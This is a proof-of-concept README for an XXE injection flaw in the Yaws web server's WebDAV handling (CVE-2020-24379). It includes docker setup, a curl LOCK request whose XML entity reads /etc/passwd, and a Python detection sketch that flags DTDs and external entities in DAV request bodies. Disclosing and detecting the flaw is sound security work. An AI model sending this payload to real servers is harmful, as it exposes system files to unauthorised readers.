Yaws web server XML external entity injection POC

vulnbe/poc-yaws-dav-xxe

XXE in Yaws web server (CVE-2020-24379)

Proof of concept

Build test image:

docker build -t vulnbe/yaws-pocs:xxe-dav-mod -f Dockerfile .

and/or

Run container:

docker run --rm -d -i -p 127.0.0.1:8000:8080 vulnbe/yaws-pocs:xxe-dav-mod

Then run:

curl -i -s -k -X LOCK http://localhost:8000/ -H 'Timeout: Second-1' \
  --data-binary @- << EOF
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///etc/passwd">
]>
<d:lockinfo xmlns:d="DAV:">
  <d:lockscope><d:exclusive/></d:lockscope>
  <d:locktype><d:write/></d:locktype>
  <d:owner>
  <d:href><r>&sp;</r></d:href>
  </d:owner>
  </d:lockinfo>
EOF
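
For detection in front of a Yaws instance with DAV enabled, the following added example (not part of this repository) inspects WebDAV request bodies for DTDs and external entity declarations like the one in the request above. The names `inspect_dav_request` and `decode_body`, the verdict labels and the policy that DAV clients never need to send a DTD are assumptions of this sketch.

```python
import codecs
import re

# WebDAV methods whose request bodies are XML (RFC 4918).
DAV_XML_METHODS = {"LOCK", "PROPFIND", "PROPPATCH"}

_DOCTYPE = re.compile(r"<!DOCTYPE\b")
_ENTITY_DECL = re.compile(
    r"<!ENTITY\s+(?:%\s+)?(?P<name>[^\s%>]+)\s+(?P<kind>SYSTEM|PUBLIC)\s+(?P<rest>[^>]*)>")
_QUOTED = re.compile(r"\"([^\"]*)\"|'([^']*)'")

def decode_body(raw: bytes) -> str:
    """Decode before matching so UTF-16 bodies are not missed by byte patterns."""
    if raw.startswith((codecs.BOM_UTF16_LE, codecs.BOM_UTF16_BE)):
        return raw.decode("utf-16", errors="replace")
    if raw.startswith(b"<\x00"):
        return raw.decode("utf-16-le", errors="replace")
    if raw.startswith(b"\x00<"):
        return raw.decode("utf-16-be", errors="replace")
    return raw.decode("utf-8-sig", errors="replace")

def inspect_dav_request(method: str, body: bytes) -> dict:
    """Verdict for one request: allow, flag (bare DTD) or block (external entity)."""
    result = {"method": method.upper(), "has_doctype": False,
              "external_entities": [], "verdict": "allow"}
    if result["method"] not in DAV_XML_METHODS or not body:
        return result
    text = decode_body(body)
    result["has_doctype"] = bool(_DOCTYPE.search(text))
    for decl in _ENTITY_DECL.finditer(text):
        literals = [a or b for a, b in _QUOTED.findall(decl.group("rest"))]
        # SYSTEM carries one literal, PUBLIC two; the system identifier is last.
        system_id = literals[-1] if literals else ""
        result["external_entities"].append((decl.group("name"), system_id))
    if result["external_entities"]:
        result["verdict"] = "block"
    elif result["has_doctype"]:
        # Policy assumption: DAV clients have no need to send a DTD.
        result["verdict"] = "flag"
    return result

# Constructed sample bodies; the first mirrors the request shown above.
SAMPLE_XXE = (b'<?xml version="1.0" encoding="utf-8" ?>\n<!DOCTYPE r [\n'
              b'<!ELEMENT r ANY >\n<!ENTITY sp SYSTEM "file:///etc/passwd">\n]>\n'
              b'<d:lockinfo xmlns:d="DAV:"><d:owner><d:href><r>&sp;</r></d:href>'
              b'</d:owner></d:lockinfo>')
SAMPLE_BENIGN = (b'<?xml version="1.0" encoding="utf-8" ?>\n<d:lockinfo xmlns:d="DAV:">'
                 b'<d:lockscope><d:exclusive/></d:lockscope></d:lockinfo>')
```

Pattern matching of this kind is a logging and filtering aid at a proxy; it does not replace disabling external entity resolution in the XML parser itself.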

Credit

Alexey Pronin (@vulnbe)
